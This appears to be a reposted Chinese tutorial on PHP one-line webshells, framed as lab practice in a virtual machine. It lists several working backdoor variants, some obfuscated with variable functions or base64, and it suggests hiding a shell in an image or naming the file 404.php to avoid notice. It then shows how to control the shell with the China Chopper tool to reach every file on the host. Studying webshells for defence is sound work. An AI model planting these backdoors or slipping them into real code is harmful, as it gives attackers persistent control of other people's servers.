您的位置 首页 php

一句话木马的简单实操之web安全

在互联网时代,数据安全和个人隐私受到前所未有的挑战,各种新颖的攻击技术层出不穷。 我们如何才能更好地保护我们的数据呢?

  • 用web系统语言编写的病毒,病毒上传服务器后当成页面被攻击者访问,常当做后门
  • 攻击者留后门,文件数据库操作,修改web页面
  • 特点:只需要一句话,隐蔽性强,危害大
  • 常用写法
  • <?php @eval($_POST[‘data’]); ?>
  • <?php @assert($_POST[‘data’]); ?>
  • <?php @call_user_func(assert,$_POST[‘data’]); ?>
  • <?php $a= “eval”; $a(@$_POST[‘data’]);?>
  • <?php $a= base64_decode(“ZXZhbA= =”); $a(@$_POST[‘data’]);?>
  • <?php $_GET[a]($_GET[B]); ?>
  • 还可以插入图片里做成图片马

工具准备

  • 虚拟机:病毒只作为学习了解,所以用虚拟机和真机互通
  • 中国菜刀 :用于利用一句话木马访问目标主机
  • 小皮系统:网站环境搭建
  • HbuilderX:来编写php的网页

1.用 HBuilder X 创建两个文件index.php 和 404.php

2. index.php为真机的php网页,内容随意

3.404.php 为木马文件,假装木马文件已经上传到了真机的文件夹内,取404也是为了隐藏文件,内容如下

4. 打开phpstudy的站点域名管理,设置域名,端口号和项目目录

浏览器中输入访问网页

虚拟机和真机互通

打开虚拟机,设置桥接模式,实现虚拟机和真机的互通

在虚拟机C:\Windows\System32\drivers\etc文件夹中设置host文件把主机ip和域名的映射过去

在虚拟机的浏览器中访问php网页

实施一句话木马

然后在虚拟机中打开中国菜刀软件,新建shell,输入木马文件的路径和木马中post内的值,字符设置为utf-8,点击确认。如果成功只需要一两秒中,就可以访问到真机中的所有文件内容

文章来源:智云一二三科技

文章标题:一句话木马的简单实操之web安全

文章地址:https://www.zhihuclub.com/151115.shtml

关于作者: 智云科技

热门文章

网站地图